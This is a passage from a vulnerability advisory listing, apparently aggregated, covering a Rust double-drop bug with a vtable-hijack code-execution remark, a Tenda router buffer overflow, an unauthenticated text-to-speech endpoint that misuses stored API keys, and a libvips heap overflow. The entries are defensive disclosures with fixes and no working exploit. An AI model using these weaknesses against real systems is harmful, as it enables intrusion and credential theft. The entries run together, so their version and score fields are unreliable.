2. (Vulnerability 1) An iterator is created via `into_iter()` and dropped before being fully consumed, or (Vulnerability 2) `clear()` is called while a remaining element's `Drop` implementation can panic
3. The `Drop` implementation of a remaining element triggers a panic

Additionally, when combined with `Box<dyn Trait>` types, an exploit primitive enabling Arbitrary Code Execution (ACE) via heap spray and vtable hijacking has been confirmed. If the freed fat pointer slot (16 bytes) at the point of Double Drop is reclaimed by an attacker-controlled fake vtable, subsequent Drop calls can be redirected to attacker-controlled code.
Affected versions
All versions < 0.2.16
Vulnerability type
CWE-415 — CWE-415
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Full description
A vulnerability was found in Tenda F451 1.0.0.7_cn_svn7958. This issue affects the function fromGstDhcpSetSer of the file /goform/GstDhcpSetSer of the component httpd. Manipulation of the argument dips results in a buffer overflow. The attack may be initiated remotely. The exploit has been made public and could be used.
Vulnerability type
CWE-119 — Buffer Overflow
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Full description
### Summary

The text-to-speech generation endpoint (`POST /api/v1/text-to-speech/generate`) is whitelisted (no auth) and accepts a `credentialId` directly in the request body. When called without a `chatflowId`, the endpoint uses the provided `credentialId` to decrypt the stored credential (e.g., OpenAI or ElevenLabs API key) and generate speech.

### Root Cause

```typescript
// packages/server/src/controllers/text-to-speech/index.ts:58-64
} else {
    // Use TTS config from request body
    provider = bodyProvider
    credentialId = bodyCredentialId   // ← attacker-controlled credential ID
    voice = bodyVoice
    model = bodyModel
}
```

### Docker Validation

`POST /api/v1/text-to-speech/generate` with an arbitrary `credentialId` in the body: the endpoint processes the request, sends an SSE `tts_start` event, and only fails when the credential doesn't exist, which shows the code path runs without authentication.

### Impact

- Use victim's API keys (OpenAI, ElevenLabs, Azure, Google) without authorization
- Burn API credits on the victim's account
- Generate unlimited speech content at victim's expense
- Combined with credential ID leak from Finding 2, this is trivially exploitable

### Suggested Fix

Remove the TTS endpoint from `WHITELIST_URLS` or validate that the credential belongs to the chatflow being used:

```typescript
// Only allow credentialId when it matches the chatflow's TTS configuration
if (!chatflowId) {
    return res.status(401).json({ message: 'Authentication required' })
}
```

---

## References

- `packages/server/src/controllers/text-to-speech/index.ts` lines 10-162
- `packages/server/src/utils/constants.ts` line 41 (whitelist entry)

## Credits

- Shinobi Security - https://github.com/shinobisecurity
Affected versions
All versions < 3.1.0
CVSS Vector
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Full description
A security vulnerability has been detected in libvips up to 8.18.2. The affected element is the function im_minpos_vec of the file libvips/deprecated/vips7compat.c of the component nip2 Handler. Manipulation of the argument n leads to a heap-based buffer overflow. The attack has to be approached locally. The exploit has been disclosed publicly and may be used. The vendor confirms that they will "be removing the deprecated area in libvips 8.19".
Vulnerability type
CWE-119 — Buffer Overflow
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
References
https://github.com/libvips/libvips/
https://github.com/libvips/libvips/issues/4965
https://github.com/libvips/libvips/issues/4965#issuecomment-4135003499
https://vuldb.com/submit/786994
https://vuldb.com/vuln/358035
https://vuldb.com/vuln/358035/cti